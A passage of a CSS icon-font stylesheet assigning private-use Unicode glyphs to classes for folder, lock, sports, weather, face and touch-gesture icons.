.icon-folder-upload2:before {
    content: "\ea00";
}
.icon-folder-upload3:before {
    content: "\ea01";
}
.icon-folder-unlocked:before {
    content: "\ea02";
}
.icon-folder-unlocked2:before {
    content: "\ea03";
}
.icon-folder-locked:before {
    content: "\ea04";
}
.icon-folder-locked2:before {
    content: "\ea05";
}
.icon-folder-search:before {
    content: "\ea06";
}
.icon-folder-search2:before {
    content: "\ea07";
}
.icon-folder-error:before {
    content: "\ea08";
}
.icon-folder-error2:before {
    content: "\ea09";
}
.icon-folder-cancel:before {
    content: "\ea0a";
}
.icon-folder-cancel2:before {
    content: "\ea0b";
}
.icon-folder-checked:before {
    content: "\ea0c";
}
.icon-folder-checked2:before {
    content: "\ea0d";
}
.icon-folder-add:before {
    content: "\ea0e";
}
.icon-folder-add2:before {
    content: "\ea0f";
}
.icon-folder-remove:before {
    content: "\ea10";
}
.icon-folder-remove2:before {
    content: "\ea11";
}
.icon-folder-forbidden:before {
    content: "\ea12";
}
.icon-folder-forbidden2:before {
    content: "\ea13";
}
.icon-folder-bookmark:before {
    content: "\ea14";
}
.icon-folder-bookmark2:before {
    content: "\ea15";
}
.icon-document-zip:before {
    content: "\ea16";
}
.icon-document-zip2:before {
    content: "\ea17";
}
.icon-zip:before {
    content: "\ea18";
}
.icon-zip2:before {
    content: "\ea19";
}
.icon-search4:before {
    content: "\ea1a";
}
.icon-search5:before {
    content: "\ea1b";
}
.icon-search-plus:before {
    content: "\ea1c";
}
.icon-search-plus2:before {
    content: "\ea1d";
}
.icon-search-minus:before {
    content: "\ea1e";
}
.icon-search-minus2:before {
    content: "\ea1f";
}
.icon-lock4:before {
    content: "\ea20";
}
.icon-lock5:before {
    content: "\ea21";
}
.icon-lock-open:before {
    content: "\ea22";
}
.icon-lock-open2:before {
    content: "\ea23";
}
.icon-lock-open3:before {
    content: "\ea24";
}
.icon-lock-open4:before {
    content: "\ea25";
}
.icon-lock-stripes:before {
    content: "\ea26";
}
.icon-lock-stripes2:before {
    content: "\ea27";
}
.icon-lock-rounded:before {
    content: "\ea28";
}
.icon-lock-rounded2:before {
    content: "\ea29";
}
.icon-lock-rounded-open:before {
    content: "\ea2a";
}
.icon-lock-rounded-open2:before {
    content: "\ea2b";
}
.icon-lock-rounded-open3:before {
    content: "\ea2c";
}
.icon-lock-rounded-open4:before {
    content: "\ea2d";
}
.icon-combination-lock:before {
    content: "\ea2e";
}
.icon-combination-lock2:before {
    content: "\ea2f";
}
.icon-printer3:before {
    content: "\ea30";
}
.icon-printer4:before {
    content: "\ea31";
}
.icon-printer5:before {
    content: "\ea32";
}
.icon-printer6:before {
    content: "\ea33";
}
.icon-printer-text:before {
    content: "\ea34";
}
.icon-printer-text2:before {
    content: "\ea35";
}
.icon-printer-text3:before {
    content: "\ea36";
}
.icon-printer-text4:before {
    content: "\ea37";
}
.icon-document-shred:before {
    content: "\ea38";
}
.icon-document-shred2:before {
    content: "\ea39";
}
.icon-shredder:before {
    content: "\ea3a";
}
.icon-shredder2:before {
    content: "\ea3b";
}
.icon-document-scan:before {
    content: "\ea3c";
}
.icon-document-scan2:before {
    content: "\ea3d";
}
.icon-cloud-download2:before {
    content: "\ea3e";
}
.icon-cloud-download3:before {
    content: "\ea3f";
}
.icon-cloud-upload2:before {
    content: "\ea40";
}
.icon-cloud-upload3:before {
    content: "\ea41";
}
.icon-cloud-error:before {
    content: "\ea42";
}
.icon-cloud-error2:before {
    content: "\ea43";
}
.icon-cloud4:before {
    content: "\ea44";
}
.icon-cloud5:before {
    content: "\ea45";
}
.icon-inbox-filled:before {
    content: "\ea46";
}
.icon-inbox-filled2:before {
    content: "\ea47";
}
.icon-pen3:before {
    content: "\ea48";
}
.icon-pen4:before {
    content: "\ea49";
}
.icon-pen-angled:before {
    content: "\ea4a";
}
.icon-pen-angled2:before {
    content: "\ea4b";
}
.icon-document-edit:before {
    content: "\ea4c";
}
.icon-document-edit2:before {
    content: "\ea4d";
}
.icon-document-certificate:before {
    content: "\ea4e";
}
.icon-document-certificate2:before {
    content: "\ea4f";
}
.icon-certificate:before {
    content: "\ea50";
}
.icon-certificate2:before {
    content: "\ea51";
}
.icon-package:before {
    content: "\ea52";
}
.icon-package2:before {
    content: "\ea53";
}
.icon-box:before {
    content: "\ea54";
}
.icon-box2:before {
    content: "\ea55";
}
.icon-box-filled:before {
    content: "\ea56";
}
.icon-box-filled2:before {
    content: "\ea57";
}
.icon-box3:before {
    content: "\ea58";
}
.icon-box4:before {
    content: "\ea59";
}
.icon-box5:before {
    content: "\ea5a";
}
.icon-box6:before {
    content: "\ea5b";
}
.icon-box-bookmark:before {
    content: "\ea5c";
}
.icon-box-bookmark2:before {
    content: "\ea5d";
}
.icon-tag-cord:before {
    content: "\ea5e";
}
.icon-tag-cord2:before {
    content: "\ea5f";
}
.icon-tag2:before {
    content: "\ea60";
}
.icon-tag3:before {
    content: "\ea61";
}
.icon-tags:before {
    content: "\ea62";
}
.icon-tags2:before {
    content: "\ea63";
}
.icon-tag-add:before {
    content: "\ea64";
}
.icon-tag-add2:before {
    content: "\ea65";
}
.icon-tag-remove:before {
    content: "\ea66";
}
.icon-tag-remove2:before {
    content: "\ea67";
}
.icon-tag-checked:before {
    content: "\ea68";
}
.icon-tag-checked2:before {
    content: "\ea69";
}
.icon-tag-cancel:before {
    content: "\ea6a";
}
.icon-tag-cancel2:before {
    content: "\ea6b";
}
.icon-paperclip2:before {
    content: "\ea6c";
}
.icon-paperclip3:before {
    content: "\ea6d";
}
.icon-basketball:before {
    content: "\ea6e";
}
.icon-basketball2:before {
    content: "\ea6f";
}
.icon-baseball:before {
    content: "\ea70";
}
.icon-baseball2:before {
    content: "\ea71";
}
.icon-tennis-ball:before {
    content: "\ea72";
}
.icon-tennis-ball2:before {
    content: "\ea73";
}
.icon-bowling-ball:before {
    content: "\ea74";
}
.icon-bowling-ball2:before {
    content: "\ea75";
}
.icon-billiard-ball:before {
    content: "\ea76";
}
.icon-billiard-ball2:before {
    content: "\ea77";
}
.icon-soccer-ball:before {
    content: "\ea78";
}
.icon-soccer-ball2:before {
    content: "\ea79";
}
.icon-soccer-court:before {
    content: "\ea7a";
}
.icon-soccer-court2:before {
    content: "\ea7b";
}
.icon-football:before {
    content: "\ea7c";
}
.icon-football2:before {
    content: "\ea7d";
}
.icon-football3:before {
    content: "\ea7e";
}
.icon-football4:before {
    content: "\ea7f";
}
.icon-basketball3:before {
    content: "\ea80";
}
.icon-basketball4:before {
    content: "\ea81";
}
.icon-baseball-set:before {
    content: "\ea82";
}
.icon-baseball-set2:before {
    content: "\ea83";
}
.icon-tennis-ball3:before {
    content: "\ea84";
}
.icon-tennis-ball4:before {
    content: "\ea85";
}
.icon-trophy3:before {
    content: "\ea86";
}
.icon-trophy4:before {
    content: "\ea87";
}
.icon-trophy-one:before {
    content: "\ea88";
}
.icon-trophy-one2:before {
    content: "\ea89";
}
.icon-trophy5:before {
    content: "\ea8a";
}
.icon-trophy6:before {
    content: "\ea8b";
}
.icon-medal:before {
    content: "\ea8c";
}
.icon-medal2:before {
    content: "\ea8d";
}
.icon-medal3:before {
    content: "\ea8e";
}
.icon-medal4:before {
    content: "\ea8f";
}
.icon-weights:before {
    content: "\ea90";
}
.icon-weights2:before {
    content: "\ea91";
}
.icon-tennis-racket:before {
    content: "\ea92";
}
.icon-tennis-racket2:before {
    content: "\ea93";
}
.icon-basketball-hoop:before {
    content: "\ea94";
}
.icon-basketball-hoop2:before {
    content: "\ea95";
}
.icon-table-tennis:before {
    content: "\ea96";
}
.icon-table-tennis2:before {
    content: "\ea97";
}
.icon-volleyball:before {
    content: "\ea98";
}
.icon-volleyball2:before {
    content: "\ea99";
}
.icon-stop-watch:before {
    content: "\ea9a";
}
.icon-stop-watch2:before {
    content: "\ea9b";
}
.icon-stop-watch3:before {
    content: "\ea9c";
}
.icon-stop-watch4:before {
    content: "\ea9d";
}
.icon-hockey-stick:before {
    content: "\ea9e";
}
.icon-hockey-stick2:before {
    content: "\ea9f";
}
.icon-hockey-sticks:before {
    content: "\eaa0";
}
.icon-hockey-sticks2:before {
    content: "\eaa1";
}
.icon-shuttlecock:before {
    content: "\eaa2";
}
.icon-shuttlecock2:before {
    content: "\eaa3";
}
.icon-golf:before {
    content: "\eaa4";
}
.icon-golf2:before {
    content: "\eaa5";
}
.icon-move:before {
    content: "\eaa6";
}
.icon-move2:before {
    content: "\eaa7";
}
.icon-clipboard-move:before {
    content: "\eaa8";
}
.icon-clipboard-move2:before {
    content: "\eaa9";
}
.icon-award:before {
    content: "\eaaa";
}
.icon-award2:before {
    content: "\eaab";
}
.icon-award3:before {
    content: "\eaac";
}
.icon-award4:before {
    content: "\eaad";
}
.icon-award5:before {
    content: "\eaae";
}
.icon-award6:before {
    content: "\eaaf";
}
.icon-award7:before {
    content: "\eab0";
}
.icon-award8:before {
    content: "\eab1";
}
.icon-medal5:before {
    content: "\eab2";
}
.icon-medal6:before {
    content: "\eab3";
}
.icon-medal7:before {
    content: "\eab4";
}
.icon-medal8:before {
    content: "\eab5";
}
.icon-boxing-glove:before {
    content: "\eab6";
}
.icon-boxing-glove2:before {
    content: "\eab7";
}
.icon-whistle:before {
    content: "\eab8";
}
.icon-whistle2:before {
    content: "\eab9";
}
.icon-volleyball-water:before {
    content: "\eaba";
}
.icon-volleyball-water2:before {
    content: "\eabb";
}
.icon-checkered-flag:before {
    content: "\eabc";
}
.icon-checkered-flag2:before {
    content: "\eabd";
}
.icon-target-arrow:before {
    content: "\eabe";
}
.icon-target-arrow2:before {
    content: "\eabf";
}
.icon-target3:before {
    content: "\eac0";
}
.icon-target4:before {
    content: "\eac1";
}
.icon-sailing-boat:before {
    content: "\eac2";
}
.icon-sailing-boat2:before {
    content: "\eac3";
}
.icon-sailing-boat-water:before {
    content: "\eac4";
}
.icon-sailing-boat-water2:before {
    content: "\eac5";
}
.icon-bowling-pins:before {
    content: "\eac6";
}
.icon-bowling-pins2:before {
    content: "\eac7";
}
.icon-bowling-pin-ball:before {
    content: "\eac8";
}
.icon-bowling-pin-ball2:before {
    content: "\eac9";
}
.icon-diving-goggles:before {
    content: "\eaca";
}
.icon-diving-goggles2:before {
    content: "\eacb";
}
.icon-sports-shoe:before {
    content: "\eacc";
}
.icon-sports-shoe2:before {
    content: "\eacd";
}
.icon-soccer-shoe:before {
    content: "\eace";
}
.icon-soccer-shoe2:before {
    content: "\eacf";
}
.icon-ice-skate:before {
    content: "\ead0";
}
.icon-ice-skate2:before {
    content: "\ead1";
}
.icon-cloud6:before {
    content: "\ead2";
}
.icon-cloud7:before {
    content: "\ead3";
}
.icon-cloud-sun:before {
    content: "\ead4";
}
.icon-cloud-sun2:before {
    content: "\ead5";
}
.icon-cloud-moon:before {
    content: "\ead6";
}
.icon-cloud-moon2:before {
    content: "\ead7";
}
.icon-cloud-rain:before {
    content: "\ead8";
}
.icon-cloud-rain2:before {
    content: "\ead9";
}
.icon-cloud-sun-rain:before {
    content: "\eada";
}
.icon-cloud-sun-rain2:before {
    content: "\eadb";
}
.icon-cloud-moon-rain:before {
    content: "\eadc";
}
.icon-cloud-moon-rain2:before {
    content: "\eadd";
}
.icon-cloud-snow:before {
    content: "\eade";
}
.icon-cloud-snow2:before {
    content: "\eadf";
}
.icon-cloud-sun-snow:before {
    content: "\eae0";
}
.icon-cloud-sun-snow2:before {
    content: "\eae1";
}
.icon-cloud-moon-snow:before {
    content: "\eae2";
}
.icon-cloud-moon-snow2:before {
    content: "\eae3";
}
.icon-cloud-lightning:before {
    content: "\eae4";
}
.icon-cloud-lightning2:before {
    content: "\eae5";
}
.icon-cloud-sun-lightning:before {
    content: "\eae6";
}
.icon-cloud-sun-lightning2:before {
    content: "\eae7";
}
.icon-cloud-moon-lightning:before {
    content: "\eae8";
}
.icon-cloud-moon-lightning2:before {
    content: "\eae9";
}
.icon-cloud-wind:before {
    content: "\eaea";
}
.icon-cloud-wind2:before {
    content: "\eaeb";
}
.icon-cloud-raindrops:before {
    content: "\eaec";
}
.icon-cloud-raindrops2:before {
    content: "\eaed";
}
.icon-cloud-sun-raindrops:before {
    content: "\eaee";
}
.icon-cloud-sun-raindrops2:before {
    content: "\eaef";
}
.icon-cloud-moon-raindrops:before {
    content: "\eaf0";
}
.icon-cloud-moon-raindrops2:before {
    content: "\eaf1";
}
.icon-cloud-snowflakes:before {
    content: "\eaf2";
}
.icon-cloud-snowflakes2:before {
    content: "\eaf3";
}
.icon-cloud-sun-snowflakes:before {
    content: "\eaf4";
}
.icon-cloud-sun-snowflakes2:before {
    content: "\eaf5";
}
.icon-cloud-moon-snowflakes:before {
    content: "\eaf6";
}
.icon-cloud-moon-snowflakes2:before {
    content: "\eaf7";
}
.icon-clouds:before {
    content: "\eaf8";
}
.icon-clouds2:before {
    content: "\eaf9";
}
.icon-cloud-add:before {
    content: "\eafa";
}
.icon-cloud-add2:before {
    content: "\eafb";
}
.icon-cloud-remove:before {
    content: "\eafc";
}
.icon-cloud-remove2:before {
    content: "\eafd";
}
.icon-cloud-error3:before {
    content: "\eafe";
}
.icon-cloud-error4:before {
    content: "\eaff";
}
.icon-cloud-fog:before {
    content: "\eb00";
}
.icon-cloud-fog2:before {
    content: "\eb01";
}
.icon--cloud-sun-fog:before {
    content: "\eb02";
}
.icon--cloud-sun-fog2:before {
    content: "\eb03";
}
.icon-cloud-moon-fog:before {
    content: "\eb04";
}
.icon-cloud-moon-fog2:before {
    content: "\eb05";
}
.icon-moon-stars:before {
    content: "\eb06";
}
.icon-moon-stars2:before {
    content: "\eb07";
}
.icon-moon:before {
    content: "\eb08";
}
.icon-moon2:before {
    content: "\eb09";
}
.icon-sun2:before {
    content: "\eb0a";
}
.icon-sun3:before {
    content: "\eb0b";
}
.icon-sunrise:before {
    content: "\eb0c";
}
.icon-sunrise2:before {
    content: "\eb0d";
}
.icon-sunset:before {
    content: "\eb0e";
}
.icon-sunset2:before {
    content: "\eb0f";
}
.icon-sunset3:before {
    content: "\eb10";
}
.icon-sunset4:before {
    content: "\eb11";
}
.icon-sunset5:before {
    content: "\eb12";
}
.icon-sunset6:before {
    content: "\eb13";
}
.icon-rainbow:before {
    content: "\eb14";
}
.icon-rainbow2:before {
    content: "\eb15";
}
.icon-umbrella:before {
    content: "\eb16";
}
.icon-umbrella2:before {
    content: "\eb17";
}
.icon-raindrops:before {
    content: "\eb18";
}
.icon-raindrops2:before {
    content: "\eb19";
}
.icon-raindrop:before {
    content: "\eb1a";
}
.icon-raindrop2:before {
    content: "\eb1b";
}
.icon-sunglasses:before {
    content: "\eb1c";
}
.icon-sunglasses2:before {
    content: "\eb1d";
}
.icon-stars:before {
    content: "\eb1e";
}
.icon-stars2:before {
    content: "\eb1f";
}
.icon-clouds3:before {
    content: "\eb20";
}
.icon-clouds4:before {
    content: "\eb21";
}
.icon-moonrise:before {
    content: "\eb22";
}
.icon-moonrise2:before {
    content: "\eb23";
}
.icon-moonset:before {
    content: "\eb24";
}
.icon-moonset2:before {
    content: "\eb25";
}
.icon-wind:before {
    content: "\eb26";
}
.icon-wind2:before {
    content: "\eb27";
}
.icon-full-moon:before {
    content: "\eb28";
}
.icon-full-moon2:before {
    content: "\eb29";
}
.icon-crescent:before {
    content: "\eb2a";
}
.icon-crescent2:before {
    content: "\eb2b";
}
.icon-half-moon:before {
    content: "\eb2c";
}
.icon-half-moon2:before {
    content: "\eb2d";
}
.icon-gibbous-moon:before {
    content: "\eb2e";
}
.icon-gibbous-moon2:before {
    content: "\eb2f";
}
.icon-moon3:before {
    content: "\eb30";
}
.icon-moon4:before {
    content: "\eb31";
}
.icon-gibbous-moon3:before {
    content: "\eb32";
}
.icon-gibbous-moon4:before {
    content: "\eb33";
}
.icon-half-moon3:before {
    content: "\eb34";
}
.icon-half-moon4:before {
    content: "\eb35";
}
.icon-crescent3:before {
    content: "\eb36";
}
.icon-crescent4:before {
    content: "\eb37";
}
.icon-barometer:before {
    content: "\eb38";
}
.icon-barometer2:before {
    content: "\eb39";
}
.icon-compass-north:before {
    content: "\eb3a";
}
.icon-compass-north2:before {
    content: "\eb3b";
}
.icon-compass-west:before {
    content: "\eb3c";
}
.icon-compass-west2:before {
    content: "\eb3d";
}
.icon-compass-east:before {
    content: "\eb3e";
}
.icon-compass-east2:before {
    content: "\eb3f";
}
.icon-compass-south:before {
    content: "\eb40";
}
.icon-compass-south2:before {
    content: "\eb41";
}
.icon-air-sock:before {
    content: "\eb42";
}
.icon-air-sock2:before {
    content: "\eb43";
}
.icon-tornado:before {
    content: "\eb44";
}
.icon-tornado2:before {
    content: "\eb45";
}
.icon-degree-fahrenheit:before {
    content: "\eb46";
}
.icon-degree-fahrenheit2:before {
    content: "\eb47";
}
.icon-degree-celsius:before {
    content: "\eb48";
}
.icon-degree-celsius2:before {
    content: "\eb49";
}
.icon-warning2:before {
    content: "\eb4a";
}
.icon-warning3:before {
    content: "\eb4b";
}
.icon-compass4:before {
    content: "\eb4c";
}
.icon-compass5:before {
    content: "\eb4d";
}
.icon-compass6:before {
    content: "\eb4e";
}
.icon-compass7:before {
    content: "\eb4f";
}
.icon-compass8:before {
    content: "\eb50";
}
.icon-compass9:before {
    content: "\eb51";
}
.icon-compass10:before {
    content: "\eb52";
}
.icon-compass11:before {
    content: "\eb53";
}
.icon-thermometer:before {
    content: "\eb54";
}
.icon-thermometer2:before {
    content: "\eb55";
}
.icon-thermometer-low:before {
    content: "\eb56";
}
.icon-thermometer-low2:before {
    content: "\eb57";
}
.icon-thermometer-quarter:before {
    content: "\eb58";
}
.icon-thermometer-quarter2:before {
    content: "\eb59";
}
.icon-thermometer-half:before {
    content: "\eb5a";
}
.icon-thermometer-half2:before {
    content: "\eb5b";
}
.icon-thermometer-three-quarters:before {
    content: "\eb5c";
}
.icon-thermometer-three-quarters2:before {
    content: "\eb5d";
}
.icon-thermometer-full:before {
    content: "\eb5e";
}
.icon-thermometer-full2:before {
    content: "\eb5f";
}
.icon-lightning:before {
    content: "\eb60";
}
.icon-lightning2:before {
    content: "\eb61";
}
.icon-wind-turbine:before {
    content: "\eb62";
}
.icon-wind-turbine2:before {
    content: "\eb63";
}
.icon-snowflake:before {
    content: "\eb64";
}
.icon-snowflake2:before {
    content: "\eb65";
}
.icon-flashed-face:before {
    content: "\eb66";
}
.icon-flashed-face2:before {
    content: "\eb67";
}
.icon-flashed-face3:before {
    content: "\eb68";
}
.icon-flashed-face4:before {
    content: "\eb69";
}
.icon-flashed-face-glasses:before {
    content: "\eb6a";
}
.icon-flashed-face-glasses2:before {
    content: "\eb6b";
}
.icon-face-missing-moth:before {
    content: "\eb6c";
}
.icon-face-missing-moth2:before {
    content: "\eb6d";
}
.icon-neutral-face:before {
    content: "\eb6e";
}
.icon-neutral-face2:before {
    content: "\eb6f";
}
.icon-smiling-face:before {
    content: "\eb70";
}
.icon-smiling-face2:before {
    content: "\eb71";
}
.icon-sad-face:before {
    content: "\eb72";
}
.icon-sad-face2:before {
    content: "\eb73";
}
.icon-face-open-mouth:before {
    content: "\eb74";
}
.icon-face-open-mouth2:before {
    content: "\eb75";
}
.icon-face-open-mouth3:before {
    content: "\eb76";
}
.icon-face-open-mouth4:before {
    content: "\eb77";
}
.icon-winking-face:before {
    content: "\eb78";
}
.icon-winking-face2:before {
    content: "\eb79";
}
.icon-laughing-face:before {
    content: "\eb7a";
}
.icon-laughing-face2:before {
    content: "\eb7b";
}
.icon-laughing-face3:before {
    content: "\eb7c";
}
.icon-laughing-face4:before {
    content: "\eb7d";
}
.icon-smirking-face:before {
    content: "\eb7e";
}
.icon-smirking-face2:before {
    content: "\eb7f";
}
.icon-stubborn-face:before {
    content: "\eb80";
}
.icon-stubborn-face2:before {
    content: "\eb81";
}
.icon-neutral-face3:before {
    content: "\eb82";
}
.icon-neutral-face4:before {
    content: "\eb83";
}
.icon-sad-face3:before {
    content: "\eb84";
}
.icon-sad-face4:before {
    content: "\eb85";
}
.icon-smiling-face3:before {

    content: "\eb86";
}
.icon-smiling-face4:before {
    content: "\eb87";
}
.icon-smiling-face-eyebrows:before {
    content: "\eb88";
}
.icon-smiling-face-eyebrows2:before {
    content: "\eb89";
}
.icon-grinning-face-eyebrows:before {
    content: "\eb8a";
}
.icon-grinning-face-eyebrows2:before {
    content: "\eb8b";
}
.icon-sad-face-eyebrows:before {
    content: "\eb8c";
}
.icon-sad-face-eyebrows2:before {
    content: "\eb8d";
}
.icon-neutral-face-eyebrows:before {
    content: "\eb8e";
}
.icon-neutral-face-eyebrows2:before {
    content: "\eb8f";
}
.icon-angry-face:before {
    content: "\eb90";
}
.icon-angry-face2:before {
    content: "\eb91";
}
.icon-worried-face:before {
    content: "\eb92";
}
.icon-worried-face2:before {
    content: "\eb93";
}
.icon-winking-face3:before {
    content: "\eb94";
}
.icon-winking-face4:before {
    content: "\eb95";
}
.icon-angry-face-eyebrows:before {
    content: "\eb96";
}
.icon-angry-face-eyebrows2:before {
    content: "\eb97";
}
.icon-grinning-face:before {
    content: "\eb98";
}
.icon-grinning-face2:before {
    content: "\eb99";
}
.icon-sad-face5:before {
    content: "\eb9a";
}
.icon-sad-face6:before {
    content: "\eb9b";
}
.icon-grinning-face-eyebrows3:before {
    content: "\eb9c";
}
.icon-grinning-face-eyebrows4:before {
    content: "\eb9d";
}
.icon-fake-grinning-face-eyebrows:before {
    content: "\eb9e";
}
.icon-fake-grinning-face-eyebrows2:before {
    content: "\eb9f";
}
.icon-worried-face-eyebrows:before {
    content: "\eba0";
}
.icon-worried-face-eyebrows2:before {
    content: "\eba1";
}
.icon-face-stuck-out-tongue:before {
    content: "\eba2";
}
.icon-face-stuck-out-tongue2:before {
    content: "\eba3";
}
.icon-face-stuck-out-tongue3:before {
    content: "\eba4";
}
.icon-face-stuck-out-tongue4:before {
    content: "\eba5";
}
.icon-kissing-face:before {
    content: "\eba6";
}
.icon-kissing-face2:before {
    content: "\eba7";
}
.icon-grinning-face-teeth:before {
    content: "\eba8";
}
.icon-grinning-face-teeth2:before {
    content: "\eba9";
}
.icon-angry-face-teeth:before {
    content: "\ebaa";
}
.icon-angry-face-teeth2:before {
    content: "\ebab";
}
.icon-worried-face-teeth:before {
    content: "\ebac";
}
.icon-worried-face-teeth2:before {
    content: "\ebad";
}
.icon-grinning-face-teeth3:before {
    content: "\ebae";
}
.icon-grinning-face-teeth4:before {
    content: "\ebaf";
}
.icon-face-open-mouth-eyebrows:before {
    content: "\ebb0";
}
.icon-face-open-mouth-eyebrows2:before {
    content: "\ebb1";
}
.icon-face-open-mouth-eyebrows3:before {
    content: "\ebb2";
}
.icon-face-open-mouth-eyebrows4:before {
    content: "\ebb3";
}
.icon-angry-face-open-mouth-eyebrows:before {
    content: "\ebb4";
}
.icon-angry-face-open-mouth-eyebrows2:before {
    content: "\ebb5";
}
.icon-unamused-face-tightly-closed-eyes:before {
    content: "\ebb6";
}
.icon-unamused-face-tightly-closed-eyes2:before {
    content: "\ebb7";
}
.icon-sad-face--tightly-closed-eyes:before {
    content: "\ebb8";
}
.icon-sad-face--tightly-closed-eyes2:before {
    content: "\ebb9";
}
.icon-kissing-face3:before {
    content: "\ebba";
}
.icon-kissing-face4:before {
    content: "\ebbb";
}
.icon-face-closed-meyes:before {
    content: "\ebbc";
}
.icon-face-closed-meyes2:before {
    content: "\ebbd";
}
.icon-amused-face:before {
    content: "\ebbe";
}
.icon-amused-face2:before {
    content: "\ebbf";
}
.icon-amused-face-closed-eyes:before {
    content: "\ebc0";
}
.icon-amused-face-closed-eyes2:before {
    content: "\ebc1";
}
.icon-amused-face-closed-eyes3:before {
    content: "\ebc2";
}
.icon-amused-face-closed-eyes4:before {
    content: "\ebc3";
}
.icon-face-closed-eyes-open-mouth:before {
    content: "\ebc4";
}
.icon-face-closed-eyes-open-mouth2:before {
    content: "\ebc5";
}
.icon-face-closed-eyes-open-mouth3:before {
    content: "\ebc6";
}
.icon-face-closed-eyes-open-mouth4:before {
    content: "\ebc7";
}
.icon-face-closed-eyes-open-mouth5:before {
    content: "\ebc8";
}
.icon-face-closed-eyes-open-mouth6:before {
    content: "\ebc9";
}
.icon-laughing-face5:before {
    content: "\ebca";
}
.icon-laughing-face6:before {
    content: "\ebcb";
}
.icon-smiling-face5:before {
    content: "\ebcc";
}
.icon-smiling-face6:before {
    content: "\ebcd";
}
.icon-grinning-face3:before {
    content: "\ebce";
}
.icon-grinning-face4:before {
    content: "\ebcf";
}
.icon-sad-face7:before {
    content: "\ebd0";
}
.icon-sad-face8:before {
    content: "\ebd1";
}
.icon-sad-face9:before {
    content: "\ebd2";
}
.icon-sad-face10:before {
    content: "\ebd3";
}
.icon-sad-face-closed-eyes:before {
    content: "\ebd4";
}
.icon-sad-face-closed-eyes2:before {
    content: "\ebd5";
}
.icon-sad-face11:before {
    content: "\ebd6";
}
.icon-sad-face12:before {
    content: "\ebd7";
}
.icon-smiling-face7:before {
    content: "\ebd8";
}
.icon-smiling-face8:before {
    content: "\ebd9";
}
.icon-astonished-face:before {
    content: "\ebda";
}
.icon-astonished-face2:before {
    content: "\ebdb";
}
.icon-astonished-face3:before {
    content: "\ebdc";
}
.icon-astonished-face4:before {
    content: "\ebdd";
}
.icon-face-moustache:before {
    content: "\ebde";
}
.icon-face-moustache2:before {
    content: "\ebdf";
}
.icon-face-moustache3:before {
    content: "\ebe0";
}
.icon-face-moustache4:before {
    content: "\ebe1";
}
.icon-face-glasses:before {
    content: "\ebe2";
}
.icon-face-glasses2:before {
    content: "\ebe3";
}
.icon-face-sunglasses:before {
    content: "\ebe4";
}
.icon-face-sunglasses2:before {
    content: "\ebe5";
}
.icon-smirking-face-sunglasses:before {
    content: "\ebe6";
}
.icon-smirking-face-sunglasses2:before {
    content: "\ebe7";
}
.icon-middle-finger:before {
    content: "\ebe8";
}
.icon-middle-finger2:before {
    content: "\ebe9";
}
.icon-rock-n-roll:before {
    content: "\ebea";
}
.icon-rock-n-roll2:before {
    content: "\ebeb";
}
.icon-high-five:before {
    content: "\ebec";
}
.icon-high-five2:before {
    content: "\ebed";
}
.icon-thumb-up:before {
    content: "\ebee";
}
.icon-thumb-up2:before {
    content: "\ebef";
}
.icon-thumb-down:before {
    content: "\ebf0";
}
.icon-thumb-down2:before {
    content: "\ebf1";
}
.icon-thumb-up3:before {
    content: "\ebf2";
}
.icon-thumb-up4:before {
    content: "\ebf3";
}
.icon-thumb-down3:before {
    content: "\ebf4";
}
.icon-thumb-down4:before {
    content: "\ebf5";
}
.icon-two-fingers-swipe-left:before {
    content: "\ebf6";
}
.icon-two-fingers-swipe-left2:before {
    content: "\ebf7";
}
.icon-two-fingers-swipe-right:before {
    content: "\ebf8";
}
.icon-two-fingers-swipe-right2:before {
    content: "\ebf9";
}
.icon-two-fingers-swipe-up:before {
    content: "\ebfa";
}
.icon-two-fingers-swipe-up2:before {
    content: "\ebfb";
}
.icon-two-fingers-swipe-down:before {
    content: "\ebfc";
}
.icon-two-fingers-swipe-down2:before {
    content: "\ebfd";
}
.icon-two-fingers:before {
    content: "\ebfe";
}
.icon-two-fingers2:before {
    content: "\ebff";
}
.icon-three-fingers-double-tap:before {
    content: "\ec00";
}
.icon-three-fingers-double-tap2:before {
    content: "\ec01";
}
.icon-two-fingers-resize-out:before {
    content: "\ec02";
}
.icon-two-fingers-resize-out2:before {
    content: "\ec03";
}
.icon-two-fingers-resize-in:before {
    content: "\ec04";
}
.icon-two-fingers-resize-in2:before {
    content: "\ec05";
}
.icon-two-fingers-rotate:before {
    content: "\ec06";
}
.icon-two-fingers-rotate2:before {
    content: "\ec07";
}
.icon-one-finger-swipe-left:before {
    content: "\ec08";
}
.icon-one-finger-swipe-left2:before {
    content: "\ec09";
}
.icon-one-finger-swipe-right:before {
    content: "\ec0a";
}
.icon-one-finger-swipe-right2:before {
    content: "\ec0b";
}
.icon-one-finger-swipe-up:before {
    content: "\ec0c";
}
.icon-one-finger-swipe-up2:before {
    content: "\ec0d";
}
.icon-one-finger-swipe-down:before {
    content: "\ec0e";
}
.icon-one-finger-swipe-down2:before {
    content: "\ec0f";
}
.icon-one-finger:before {
    content: "\ec10";
}
.icon-one-finger2:before {
    content: "\ec11";
}
.icon-one-finger-double-tap:before {
    content: "\ec12";
}
.icon-one-finger-double-tap2:before {
    content: "\ec13";
}
.icon-one-finger-tap:before {
    content: "\ec14";
}
.icon-one-finger-tap2:before {
    content: "\ec15";
}
.icon-one-finger-tap-hold:before {
    content: "\ec16";
}
.icon-one-finger-tap-hold2:before {
    content: "\ec17";
}
.icon-thumb-finger-tap:before {
    content: "\ec18";
}
.icon-thumb-finger-tap2:before {
    content: "\ec19";
}
.icon-one-finger-click:before {
    content: "\ec1a";
}
.icon-one-finger-click2:before {
    content: "\ec1b";
}
.icon-three-fingers-swipe-left:before {
    content: "\ec1c";
}
.icon-three-fingers-swipe-left2:before {
    content: "\ec1d";
}
.icon-three-fingers-swipe-right:before {
    content: "\ec1e";
}
.icon-three-fingers-swipe-right2:before {
    content: "\ec1f";
}
.icon-three-fingers-swipe-up:before {
    content: "\ec20";
}
.icon-three-fingers-swipe-up2:before {
    content: "\ec21";
}
.icon-three-fingers-swipe-down:before {
    content: "\ec22";
}
.icon-three-fingers-swipe-down2:before {
    content: "\ec23";
}
.icon-three-fingers:before {
    content: "\ec24";
}
.icon-three-fingers2:before {
    content: "\ec25";
}
.icon-three-fingers-double-tap3:before {
    content: "\ec26";
}
.icon-three-fingers-double-tap4:before {
    content: "\ec27";
}
.icon-two-fingers-swipe-up3:before {
    content: "\ec28";
}
.icon-two-fingers-swipe-up4:before {
    content: "\ec29";
}
.icon-one-finger-double-tap3:before {
    content: "\ec2a";
}
.icon-one-finger-double-tap4:before {
    content: "\ec2b";
}
.icon-two-fingers-swipe-down3:before {
    content: "\ec2c";
}
